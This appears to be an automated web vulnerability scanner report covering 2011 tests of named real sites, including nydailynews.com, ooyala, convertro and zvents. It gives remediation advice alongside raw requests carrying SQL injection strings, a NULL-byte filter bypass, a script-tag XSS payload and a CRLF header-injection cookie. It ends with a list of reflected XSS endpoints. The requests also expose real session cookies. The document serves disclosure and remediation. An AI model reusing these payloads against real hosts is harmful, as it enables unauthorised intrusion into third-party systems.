XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, BHDB, 10032011-01

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://events.nydailynews.com/partner_json/search [cat parameter] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://events.nydailynews.com
Path:	/partner_json/search

Issue detail

The cat parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the cat parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64'%20and%201%3d1--%20&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 1

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:42 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 89
ETag: "e605737c8528f9a1c4cfc7acbe40d59d"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: 37486b2ac93c0e21cb4f241a3a219e1d769f722b
Z-REQUEST-HANDLED-BY: www9
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2021

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"2011 Lincoln Center Out Of Doors: Tan Dun - The Martial Arts Trilogy","has_tickets":false,"tickets_on_sale":null,"venue_id":21814,"id":199048605,"images":[],"starttime":"Fri Aug 12 19:30:00 UTC 2011","zurl":"/new-york-ny/events/show/199048605-2011-lincoln-center-out-of-doors-tan-dun-the-martial-arts-trilogy"},{"name":"Pacha Teen Night with Dj Pauly D","has_tickets":true,"tickets_on_sale":null,"venue_id":11482,"id":201513266,"images":[{"url":"http://www.zvents.com/images/internal/6/6/7/2/img_13592766_thumb.jpg?resample_method=resized","height":272,"width":400}],"starttime":"Thu Sep 01 19:00:00 UTC 2011","zurl":"/new-york-ny/events/show/201513266-pacha-teen-night-with-dj-pauly-d"},{"name":"The 5th Annual All White Boat Party with Power105\'s DJ Prostyle and DJ Crossova","has_tickets":true,"tickets_on_sale":null,"venue_id":2592425,"id":201797846,"images":[],"starttime":"Sat Aug 13 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/201797846-the-5th-annual-all-white-boat-party-with-power105s-dj-prostyle-and-dj-crossova"}],"event_count":2678,"venues":[{"city":"New York","name":"Damrosch Park","id":21814,"zurl":"/new-york-ny/venues/show/21814-damrosch-park"},{"city":"New York","name":"Pacha","id":11482,"zurl":"/new-york-ny/venues/show/11482-pacha"},{"city":"New York","name":"Pier 40","id":2592425,"zurl":"/new-york-ny/venues/show/2592425-pier-40"},{"city":"New York","name":"Lincoln Center for the Performing Arts","id":21802,"zurl":"/new-york-ny/venues/show/21802-lincoln-center-for-the-performing-arts"}],"venue_count":4,"search_info":{"cat":null,"radius":75,"where":"New York,NY","st":"event","set":1315713599,"point":{"city":"New York","latitude":40.7561,"country":"United States","longitude":-73.987,"state":"NY"},"sort":0,"offset":0,"when":"next 30 days","what":"","catex":null,"limit":3,"sst":1313121600},"next_page":true,"identifier": "st=event&when=next+30+days&where=New+York%2CNY&ssi=0&ssrss=1&srss=3&cat=5,6,7,62,63,64"}}})')

Request 2

GET /partner_json/search?spn_limit=1&advq=true&sponsored=true&limit=3&fields=event.id%2Cevent.name%2Cevent.zurl%2Cevent.starttime%2Cevent.images%2Cevent.venue_id%2Cevent.has_tickets%2Cevent.tickets_on_sale%2Cvenue.id%2Cvenue.name%2Cvenue.city%2Cvenue.zurl&image_size=thumb&v=&cat=5%2C6%2C7%2C62%2C63%2C64'%20and%201%3d2--%20&radius=75&where=New+York%2C+NY&tag=&when=next+30+days&what=&nbh=&rand_spn=5&st=event&jsonsp=jsp_0 HTTP/1.1
Host: events.nydailynews.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=qDmk9InzgI-0h2O-xpkd0A.116556342; zvents_tracker_sid=qDmk9InzgI-0h2O-xpkd0A.116556342; __qca=P0-824525508-1312767406537; __vrf=63udomugb1a2qf1u; __vru=http://www.nydailynews.com/index.html; _zsess=BAh7CCIXZXh0ZXJuYWxfYXV0aF9kYXRhewciFGNvb2tpZV91c2VybmFtZTAiDHVzZXJfaWQwOg9zZXNzaW9uX2lkIiUwYmM1OWQ1ODg0N2FmOWY4ZWZhMjMzZjk4YWUwODZlMCINbG9jYXRpb257ECIJY2l0eSINTmV3IFlvcmsiC3JhZGl1c2kZIg1sYXRpdHVkZWYaNDAuNzU2MTAwMDAwMDAwMDA0AEC4IgplcnJvckYiEmRpc3RhbmNlX3VuaXQiCm1pbGVzIhNkaXNwbGF5X3N0cmluZyIRTmV3IFlvcmssIE5ZIg10aW1lem9uZSIVQW1lcmljYS9OZXdfWW9yayIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuOTg2OTk5OTk5OTk5OTk1AEm6IhF3aGVyZV9zdHJpbmdAFiIKc3RhdGUiB05Z--469d54a53257778116049c36876208bdf79fdd69; __utma=263866259.953009987.1312767390.1312835786.1313102150.3; __utmb=263866259.1.10.1313102150; __utmc=263866259; __utmz=263866259.1312767390.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response 2

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:35:42 GMT
Content-Type: text/plain; charset=utf-8
Connection: keep-alive
Status: 200 OK
X-Rack-Cache: miss, store
X-HTTP_CLIENT_IP_O: 50.23.123.106
Access-Control-Allow-Origin: *
X-Runtime: 95
ETag: "0357854aaaf46561bfa70a172651fb6a"
Z-DETECTED-FLAVOR: events_flavor |
X-Content-Digest: c0170047a3a7beeeb55fa12886919b77c91e35cd
Z-REQUEST-HANDLED-BY: www12
Cache-Control: max-age=1800, public
Set-Cookie:
Age: 0
Content-Length: 2048

jsp_0('callback({"rsp":{"status":"ok","content":{"events":[{"name":"The Freedom Party NYC","has_tickets":false,"tickets_on_sale":null,"venue_id":861747,"id":199524386,"images":[{"url":"http://www.zvents.com/images/internal/5/4/7/5/img_11635745_thumb.jpg?resample_method=scaled","height":null,"width":null}],"starttime":"Fri Aug 12 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/199524386-the-freedom-party-nyc"},{"name":"The 5th Annual All White Boat Party with Power105\'s DJ Prostyle and DJ Crossova","has_tickets":true,"tickets_on_sale":null,"venue_id":2592425,"id":201797846,"images":[],"starttime":"Sat Aug 13 23:00:00 UTC 2011","zurl":"/new-york-ny/events/show/201797846-the-5th-annual-all-white-boat-party-with-power105s-dj-prostyle-and-dj-crossova"},{"name":"2011 Lincoln Center Out Of Doors: 28th Annual Roots of American Music Festival","has_tickets":false,"tickets_on_sale":null,"venue_id":21814,"id":199052885,"images":[],"starttime":"Sat Aug 13 18:00:00 UTC 2011","zurl":"/new-york-ny/events/show/199052885-2011-lincoln-center-out-of-doors-28th-annual-roots-of-american-music-festival"}],"event_count":2678,"venues":[{"city":"New York","name":"Le Poisson Rouge","id":861747,"zurl":"/new-york-ny/venues/show/861747-le-poisson-rouge"},{"city":"New York","name":"Pier 40","id":2592425,"zurl":"/new-york-ny/venues/show/2592425-pier-40"},{"city":"New York","name":"Damrosch Park","id":21814,"zurl":"/new-york-ny/venues/show/21814-damrosch-park"},{"city":"New York","name":"Lincoln Center for the Performing Arts","id":21802,"zurl":"/new-york-ny/venues/show/21802-lincoln-center-for-the-performing-arts"}],"venue_count":4,"search_info":{"cat":null,"radius":75,"where":"New York,NY","st":"event","set":1315713599,"point":{"city":"New York","latitude":40.7561,"country":"United States","longitude":-73.987,"state":"NY"},"sort":0,"offset":0,"when":"next 30 days","what":"","catex":null,"limit":3,"sst":1313121600},"next_page":true,"identifier": "st=event&when=next+30+days&where=New+York%2CNY&ssi=0&ssrss=1&srss=3&cat=5,6,7,62,63,64"}}})')

1.2. http://player.ooyala.com/player.js [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://player.ooyala.com
Path:	/player.js

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be Oracle.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /player.js?width=658&height=240&embedCode=U0eGh5OiEtef9pJy5DHifDLdRY9kWEq6&browserPlacement=right250px&1%00'=1 HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/video/homepage_video.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Aug 2011 22:39:07 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-fc51be9d
X-Pad: avoid browser bug
Content-Length: 47758
Cache-Control: private, max-age=300
Date: Thu, 11 Aug 2011 22:39:08 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var Q=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...
4DJcRPFECsGUibBBgxKUkSioYDweSGsjhKwCxsXbU8thW0U3lHIlGY2vtUJmxF_MdHqpQQXNix9HNRwtZ0qctk4C47toUU8srCY_vXTjjYvHZwsqQJ7dHMG0k4-pYhqTDOejqajLQxk2x7IhfagNGyItLD1Rve3-XRGRXLXSfRODJYYTSqawY5TvjqK8hEwXKegoRtqJBorA-0i2CHbku-t7XVS0GMcGMIZ9qdzapSLkEmeGpfBOZiwgG1NFiw6Gm1e_NSy7J9ryhC0vTnRLScLgAYacVCUrmh4btbAI0GBo7prn0nfdmoVlt9k2LeQnDmvgk415luKdOMx58tdvgmWDgZVSLUEq4yb1nmwNtR7OS9GzYRiyCew0fLfXHdjt8mRLbgfo7mbTB5PkR22r_ah
...[SNIP]...

Request 2

GET /player.js?width=658&height=240&embedCode=U0eGh5OiEtef9pJy5DHifDLdRY9kWEq6&browserPlacement=right250px&1%00''=1 HTTP/1.1
Host: player.ooyala.com
Proxy-Connection: keep-alive
Referer: http://assets.nydailynews.com/video/homepage_video.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Last-Modified: Thu, 11 Aug 2011 22:39:09 GMT
Content-Type: text/javascript; charset=utf-8
X-Ooyala-Server-Id: i-ebd1a387
X-Pad: avoid browser bug
Content-Length: 47759
Cache-Control: private, max-age=300
Date: Thu, 11 Aug 2011 22:39:12 GMT
Connection: close
Vary: Accept-Encoding

(function(){var f="9.0.115";var K="6.0.65";window.OOYALA_PLAYER_JS={};var j=(navigator.appVersion.indexOf("MSIE")!==-1)?true:false;var Q=(navigator.appVersion.toLowerCase().indexOf("win")!==-1)?true:f
...[SNIP]...

2. Cross-site scripting (stored) previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://sp1.convertro.com
Path:	/trax/hit/echosign/0/

Issue detail

The value of the sid request parameter submitted to the URL /trax/hit/echosign/0/ is copied into the HTML document as plain text between tags at the URL /trax/hit/echosign/0/. The payload 34dae<script>alert(1)</script>e1e4cd6e815 was submitted in the sid parameter. This input was returned unmodified in a subsequent request for the URL /trax/hit/echosign/0/.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Issue background

Stored cross-site scripting vulnerabilities arise when data which originated from any tainted source is copied into the application's responses in an unsafe way. An attacker can use the vulnerability to inject malicious JavaScript code into the application, which will execute within the browser of any user who views the relevant application content.

The attacker-supplied code can perform a wide variety of actions, such as stealing victims' session tokens or login credentials, performing arbitrary actions on their behalf, and logging their keystrokes.

Methods for introducing malicious content include any function where request parameters or headers are processed and stored by the application, and any out-of-band channel whereby data can be introduced into the application's processing space (for example, email messages sent over SMTP which are ultimately rendered within a web mail application).

Stored cross-site scripting flaws are typically more serious than reflected vulnerabilities because they do not require a separate delivery mechanism in order to reach target users, and they can potentially be exploited to create web application worms which spread exponentially amongst application users.

Note that automated detection of stored cross-site scripting vulnerabilities cannot reliably determine whether attacks that are persisted within the application can be accessed by any other user, only by authenticated users, or only by the attacker themselves. You should review the functionality in which the vulnerability appears to determine whether the application's behaviour can feasibly be used to compromise other application users.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.

Request 1

GET /trax/hit/echosign/0/?bts=1314797651417&sid=34dae<script>alert(1)</script>e1e4cd6e815&mid=&eid=&cid=&jid=&typ=&val=1&isa=&pag=http%3A//www.echosign.com/&ref=http%3A//www.adobe.com/products/catalog.html&fup=0&cbi=nC1x1Y-bjg&new=1&nji=0&sts=1311981368&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1314797651266&atb=1314797651266&log=0.141%20-%20@%200.002%0A0.149%20-%20i.e%3A%20J%20%0A0.149%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Request 2

GET /trax/hit/echosign/0/?bts=1314797651417&sid=&mid=&eid=&cid=&jid=&typ=&val=1&isa=&pag=http%3A//www.echosign.com/&ref=http%3A//www.adobe.com/products/catalog.html&fup=0&cbi=nC1x1Y-bjg&new=1&nji=0&sts=1311981368&dis=1920x1200x16&plu=gcswf32%2C103183%3Bnpqtplugin%2C77%3Bnpqtplugin2%2C77%3Bnpqtplugin3%2C77%3Bnpqtplugin4%2C77%3Bnpqtplugin5%2C77%3Bnpqtplugin6%2C77%3Bnpqtplugin7%2C77%3BnpdeployJava1%2C602603%3Bnpjp2%2C16026%3Bnpctrl%2C40605310%3BNPAUTHZ%2C2010%3BNPSPWRAP%2C2010%3Bpdf%2C%3Bnpgeplugin%2C%3BnpCIDetect14%2C%3BnpGoogleUpdate3%2C%3Bnpitunes%2C%3Bnpwpidetector%2C14%3Bdefault_plugin%2C&ath=1314797651266&atb=1314797651266&log=0.141%20-%20@%200.002%0A0.149%20-%20i.e%3A%20J%20%0A0.149%20-%20%3E%3E%20te%3A%20%3B%20%3B%20%3B%201 HTTP/1.1
Host: sp1.convertro.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Thu, 01 Sep 2011 16:31:56 GMT
Server: Apache/2.2.9
Set-Cookie: cvo_sid1=34dae%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee1e4cd6e815; path=/; domain=.convertro.com; expires=Fri, 01-Jan-2038 00:14:06 GMT
Last-Modified: 1314894716
Etag: 1314894716
Cache-Control: private
X-CVO-RT-NOTICE: ptr-na
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
Vary: Accept-Encoding
Content-Length: 262
Connection: close
Content-Type: text/javascript

$CVO.push(['setUserSid', '34dae<script>alert(1)</script>e1e4cd6e815']);

if (window.CVO) {
CVO.log("<< H[999999999]");
}
else if (window.$CVO) {
$CVO.INFO("<< H[999999999]");
}
if (window.$CVO.getVersion) {
$CVO.push([ 'trackEventDone', "nC1x1Y-bjg" ]);
}

3. HTTP header injection previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.zvents.com
Path:	/zat

Issue detail

The value of the welcome cookie is copied into the Set-Cookie response header. The payload 1e879%0d%0a0cc620c8c08 was submitted in the welcome cookie. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /zat?r=&url=http%3A%2F%2Fwww.nydailynews.com%2Findex.html&src=widget&pid=0&cm=search&site=http%3A%2F%2Fevents.nydailynews.com&sid=13131021502530.22701324033550918&uid=13131021502530.6475123774725944&type=view&oids=e%3A199524386%2Ce%3A199052885%2Ce%3A201513266&spids=&search=st%3Devent%26when%3Dnext%2B30%2Bdays%26where%3DNew%2BYork%252CNY%26ssi%3D0%26ssrss%3D1%26srss%3D3%26cat%3D5%2C6%2C7%2C62%2C63%2C64&__t=1313102155778 HTTP/1.1
Host: www.zvents.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: welcome=1e879%0d%0a0cc620c8c08

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Thu, 11 Aug 2011 22:38:38 GMT
Content-Type: image/gif
Connection: keep-alive
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: welcome=1e879
0cc620c8c08;Path=/;Domain=zvents.com;Expires=Sat, 03-Aug-41 22: 38:38 GMT
Content-Length: 42

GIF89a.............!.......,...........D.;

4. Cross-site scripting (reflected) previous
There are 295 instances of this issue:

http://adsfac.us/ag.asp [cc parameter]
http://api.active.com/REST/ZipDma/zip/75244 [callback parameter]
http://api.active.com/REST/geotargeting/handler.ashx [callback parameter]
http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 1]
http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [REST URL parameter 2]
http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [callback parameter]
http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [name of an arbitrarily supplied request parameter]
http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [pageSize parameter]
http://api.bbyremix.bestbuy.com/v1/products(digitalSku%3E%22%22&sku%20in(8412292,1211393,9984558,2044283,2077114,1257903)) [show parameter]
http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 1]
http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [REST URL parameter 2]
http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [callback parameter]
http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [name of an arbitrarily supplied request parameter]
http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [pageSize parameter]
http://api.bbyremix.bestbuy.com/v1/products(sku%20in(8412292)&(departmentId=3)) [show parameter]
http://api.bizographics.com/v1/profile.redirect [api_key parameter]
http://api.bizographics.com/v1/profile.redirect [callback_url parameter]
http://api.demandbase.com/api/v2/ip.js [var parameter]
http://assets.nydailynews.com/favicon.ico [REST URL parameter 1]
http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 1]
http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 2]
http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 3]
http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 4]
http://assets.nydailynews.com/img/2011/08/12/alg_charla-nash_surgery.jpg [REST URL parameter 5]
http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 1]
http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 2]
http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 3]
http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 4]
http://assets.nydailynews.com/img/2011/08/12/alg_curtis_granderson.jpg [REST URL parameter 5]
http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 1]
http://assets.nydailynews.com/video/homepage_video.html [REST URL parameter 2]
http://b.scorecardresearch.com/beacon.js [c1 parameter]
http://b.scorecardresearch.com/beacon.js [c2 parameter]
http://b.scorecardresearch.com/beacon.js [c3 parameter]
http://b.scorecardresearch.com/beacon.js [c4 parameter]
http://b.scorecardresearch.com/beacon.js [c5 parameter]
http://b.scorecardresearch.com/beacon.js [c6 parameter]
http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [REST URL parameter 3]
http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callback parameter]
http://bcvipca02.rightnowtech.com/Chat/chat/rightnow [callbackArgument parameter]
http://bid.openx.net/json [c parameter]
http://brocade.netshelter.net/fixed_placement.js.php [name of an arbitrarily supplied request parameter]
http://brocade.netshelter.net/fixed_placement.js.php [publisher parameter]
http://choices.truste.com/ca [c parameter]
http://choices.truste.com/ca [cid parameter]
http://choices.truste.com/ca [iplc parameter]
http://choices.truste.com/ca [plc parameter]
http://choices.truste.com/ca [zi parameter]
http://coldbox.org/favicon.ico [REST URL parameter 1]
http://content.atomz.com/autocomplete/sp10/04/3b/7b/ [callback parameter]
http://content.bestbuyon.com/solr/select/ [callback parameter]
http://content.bestbuyon.com/solr/select/ [fl parameter]
http://content.bestbuyon.com/solr/select/ [indent parameter]
http://content.bestbuyon.com/solr/select/ [json.wrf parameter]
http://content.bestbuyon.com/solr/select/ [name of an arbitrarily supplied request parameter]
http://content.bestbuyon.com/solr/select/ [q parameter]
http://drh.img.digitalriver.com/DRHM/store [Action parameter]
http://drh.img.digitalriver.com/store [Action parameter]
http://events.nydailynews.com/json [jsonsp parameter]
http://events.nydailynews.com/json [st parameter]
http://events.nydailynews.com/partner_json/search [image_size parameter]
http://events.nydailynews.com/partner_json/search [jsonsp parameter]
